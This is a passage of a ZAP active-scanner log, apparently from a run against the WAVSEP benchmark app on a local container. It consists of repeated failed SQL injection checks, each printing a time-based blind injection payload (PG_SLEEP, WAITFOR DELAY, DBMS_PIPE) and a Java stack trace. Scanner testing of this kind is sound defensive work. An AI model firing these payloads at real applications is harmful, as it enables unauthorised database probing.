org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680297 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 3597=(SELECT 3597 FROM PG_SLEEP(5)) AND (1598=1598] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 3597=(SELECT 3597 FROM PG_SLEEP(5)) AND (1598=1598 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680298 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 8449=(SELECT 8449 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 8449=(SELECT 8449 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680299 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 8082=(SELECT 8082 FROM PG_SLEEP(5)) AND ('WVsE'='WVsE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 8082=(SELECT 8082 FROM PG_SLEEP(5)) AND ('WVsE'='WVsE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680301 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 5515=(SELECT 5515 FROM PG_SLEEP(5)) AND 'vSKq'='vSKq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 5515=(SELECT 5515 FROM PG_SLEEP(5)) AND 'vSKq'='vSKq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680301 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 9079=(SELECT 9079 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 9079=(SELECT 9079 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680303 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 8516=(SELECT 8516 FROM PG_SLEEP(5))-- ByUb] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 8516=(SELECT 8516 FROM PG_SLEEP(5))-- ByUb at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680305 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3373=3373] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3373=3373 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680307 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680308 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('qRon'='qRon] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('qRon'='qRon at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680309 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'GHTZ'='GHTZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'GHTZ'='GHTZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680310 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680311 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- oNiK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- oNiK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680312 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 5514=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(105)||CHR(103)||CHR(89),5) AND (7917=7917] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 5514=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(105)||CHR(103)||CHR(89),5) AND (7917=7917 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at 